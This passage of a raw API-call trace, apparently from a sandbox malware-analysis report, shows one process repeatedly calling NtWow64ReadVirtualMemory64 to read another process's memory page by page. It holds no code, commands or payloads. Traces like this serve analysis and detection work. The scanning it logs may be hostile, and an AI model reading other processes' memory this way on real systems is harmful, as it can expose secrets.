BufferSize=0x258c000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.661] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee38d000, Buffer=0x7ff8, BufferSize=0x258d000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.661] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee38e000, Buffer=0x7ff8, BufferSize=0x258e000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.662] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee38f000, Buffer=0x7ff8, BufferSize=0x258f000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.662] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee390000, Buffer=0x7ff8, BufferSize=0x2590000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.662] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee391000, Buffer=0x7ff8, BufferSize=0x2591000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.662] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee392000, Buffer=0x7ff8, BufferSize=0x2592000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.662] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee393000, Buffer=0x7ff8, BufferSize=0x2593000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.662] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee394000, Buffer=0x7ff8, BufferSize=0x2594000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.662] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee395000, Buffer=0x7ff8, BufferSize=0x2595000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.662] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee396000, Buffer=0x7ff8, BufferSize=0x2596000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.663] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee397000, Buffer=0x7ff8, BufferSize=0x2597000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.663] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee398000, Buffer=0x7ff8, BufferSize=0x2598000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.663] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee399000, Buffer=0x7ff8, BufferSize=0x2599000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.663] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee39a000, Buffer=0x7ff8, BufferSize=0x259a000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.663] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee39b000, Buffer=0x7ff8, BufferSize=0x259b000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.663] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee39c000, Buffer=0x7ff8, BufferSize=0x259c000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.663] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee39d000, Buffer=0x7ff8, BufferSize=0x259d000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.664] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee39e000, Buffer=0x7ff8, BufferSize=0x259e000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.664] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee39f000, Buffer=0x7ff8, BufferSize=0x259f000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.664] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee3a0000, Buffer=0x7ff8, BufferSize=0x25a0000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.664] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee3a1000, Buffer=0x7ff8, BufferSize=0x25a1000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.664] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee3a2000, Buffer=0x7ff8, BufferSize=0x25a2000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.664] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee3a3000, Buffer=0x7ff8, BufferSize=0x25a3000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.664] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee3a4000, Buffer=0x7ff8, BufferSize=0x25a4000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.665] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee3a5000, Buffer=0x7ff8, BufferSize=0x25a5000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.665] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee3a6000, Buffer=0x7ff8, BufferSize=0x25a6000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.665] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee3a7000, Buffer=0x7ff8, BufferSize=0x25a7000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.665] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee3a8000, Buffer=0x7ff8, BufferSize=0x25a8000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.665] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee3a9000, Buffer=0x7ff8, BufferSize=0x25a9000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.665] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee3aa000, Buffer=0x7ff8, BufferSize=0x25aa000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.665] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee3ab000, Buffer=0x7ff8, BufferSize=0x25ab000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.665] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee3ac000, Buffer=0x7ff8, BufferSize=0x25ac000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.666] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee3ad000, Buffer=0x7ff8, BufferSize=0x25ad000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.666] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee3ae000, Buffer=0x7ff8, BufferSize=0x25ae000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.666] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee3af000, Buffer=0x7ff8, BufferSize=0x25af000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.666] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee3b0000, Buffer=0x7ff8, BufferSize=0x25b0000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.666] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee3b1000, Buffer=0x7ff8, BufferSize=0x25b1000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.666] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee3b2000, Buffer=0x7ff8, BufferSize=0x25b2000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.666] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee3b3000, Buffer=0x7ff8, BufferSize=0x25b3000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.667] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee3b4000, Buffer=0x7ff8, BufferSize=0x25b4000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.668] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee3b5000, Buffer=0x7ff8, BufferSize=0x25b5000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.668] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee3b6000, Buffer=0x7ff8, BufferSize=0x25b6000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.668] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee3b7000, Buffer=0x7ff8, BufferSize=0x25b7000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.668] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee3b8000, Buffer=0x7ff8, BufferSize=0x25b8000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.668] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee3b9000, Buffer=0x7ff8, BufferSize=0x25b9000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.669] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee3ba000, Buffer=0x7ff8, BufferSize=0x25ba000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.669] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee3bb000, Buffer=0x7ff8, BufferSize=0x25bb000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.669] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee3bc000, Buffer=0x7ff8, BufferSize=0x25bc000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.669] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee3bd000, Buffer=0x7ff8, BufferSize=0x25bd000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.669] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee3be000, Buffer=0x7ff8, BufferSize=0x25be000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.669] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee3bf000, Buffer=0x7ff8, BufferSize=0x25bf000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.669] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee3c0000, Buffer=0x7ff8, BufferSize=0x25c0000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.670] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee3c1000, Buffer=0x7ff8, BufferSize=0x25c1000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.670] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee3c2000, Buffer=0x7ff8, BufferSize=0x25c2000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.670] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee3c3000, Buffer=0x7ff8, BufferSize=0x25c3000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.670] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee3c4000, Buffer=0x7ff8, BufferSize=0x25c4000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.670] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee3c5000, Buffer=0x7ff8, BufferSize=0x25c5000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.670] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee3c6000, Buffer=0x7ff8, BufferSize=0x25c6000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.670] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee3c7000, Buffer=0x7ff8, BufferSize=0x25c7000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.671] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee3c8000, Buffer=0x7ff8, BufferSize=0x25c8000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.671] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee3c9000, Buffer=0x7ff8, BufferSize=0x25c9000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.671] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee3ca000, Buffer=0x7ff8, BufferSize=0x25ca000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.671] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee3cb000, Buffer=0x7ff8, BufferSize=0x25cb000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.671] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee3cc000, Buffer=0x7ff8, BufferSize=0x25cc000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.671] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee3cd000, Buffer=0x7ff8, BufferSize=0x25cd000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.671] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee3ce000, Buffer=0x7ff8, BufferSize=0x25ce000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.672] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee3cf000, Buffer=0x7ff8, BufferSize=0x25cf000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.672] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee3d0000, Buffer=0x7ff8, BufferSize=0x25d0000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.672] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee3d1000, Buffer=0x7ff8, BufferSize=0x25d1000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.673] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee3d2000, Buffer=0x7ff8, BufferSize=0x25d2000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.673] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee3d3000, Buffer=0x7ff8, BufferSize=0x25d3000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.673] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee3d4000, Buffer=0x7ff8, BufferSize=0x25d4000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.673] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee3d5000, Buffer=0x7ff8, BufferSize=0x25d5000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.673] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee3d6000, Buffer=0x7ff8, BufferSize=0x25d6000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.673] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee3d7000, Buffer=0x7ff8, BufferSize=0x25d7000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.673] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee3d8000, Buffer=0x7ff8, BufferSize=0x25d8000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.674] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee3d9000, Buffer=0x7ff8, BufferSize=0x25d9000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.674] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee3da000, Buffer=0x7ff8, BufferSize=0x25da000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.674] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee3db000, Buffer=0x7ff8, BufferSize=0x25db000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.674] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee3dc000, Buffer=0x7ff8, BufferSize=0x25dc000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.674] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee3dd000, Buffer=0x7ff8, BufferSize=0x25dd000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.674] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee3de000, Buffer=0x7ff8, BufferSize=0x25de000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.674] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee3df000, Buffer=0x7ff8, BufferSize=0x25df000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.675] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee3e0000, Buffer=0x7ff8, BufferSize=0x25e0000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.675] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee3e1000, Buffer=0x7ff8, BufferSize=0x25e1000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.675] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee3e2000, Buffer=0x7ff8, BufferSize=0x25e2000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.675] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee3e3000, Buffer=0x7ff8, BufferSize=0x25e3000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.675] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee3e4000, Buffer=0x7ff8, BufferSize=0x25e4000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.675] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee3e5000, Buffer=0x7ff8, BufferSize=0x25e5000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.675] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee3e6000, Buffer=0x7ff8, BufferSize=0x25e6000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.676] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee3e7000, Buffer=0x7ff8, BufferSize=0x25e7000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.676] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee3e8000, Buffer=0x7ff8, BufferSize=0x25e8000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.676] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee3e9000, Buffer=0x7ff8, BufferSize=0x25e9000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.676] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee3ea000, Buffer=0x7ff8, BufferSize=0x25ea000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.676] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee3eb000, Buffer=0x7ff8, BufferSize=0x25eb000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.676] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee3ec000, Buffer=0x7ff8, BufferSize=0x25ec000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.676] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee3ed000, Buffer=0x7ff8, BufferSize=0x25ed000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.676] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee3ee000, Buffer=0x7ff8, BufferSize=0x25ee000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.677] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee3ef000, Buffer=0x7ff8, BufferSize=0x25ef000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.677] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee3f0000, Buffer=0x7ff8, BufferSize=0x25f0000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.677] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee3f1000, Buffer=0x7ff8, BufferSize=0x25f1000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.677] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee3f2000, Buffer=0x7ff8, BufferSize=0x25f2000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.677] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee3f3000, Buffer=0x7ff8, BufferSize=0x25f3000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.677] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee3f4000, Buffer=0x7ff8, BufferSize=0x25f4000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.677] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee3f5000, Buffer=0x7ff8, BufferSize=0x25f5000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.678] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee3f6000, Buffer=0x7ff8, BufferSize=0x25f6000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.678] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee3f7000, Buffer=0x7ff8, BufferSize=0x25f7000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.678] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee3f8000, Buffer=0x7ff8, BufferSize=0x25f8000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.678] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee3f9000, Buffer=0x7ff8, BufferSize=0x25f9000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.678] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee3fa000, Buffer=0x7ff8, BufferSize=0x25fa000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.678] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee3fb000, Buffer=0x7ff8, BufferSize=0x25fb000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.678] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee3fc000, Buffer=0x7ff8, BufferSize=0x25fc000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, 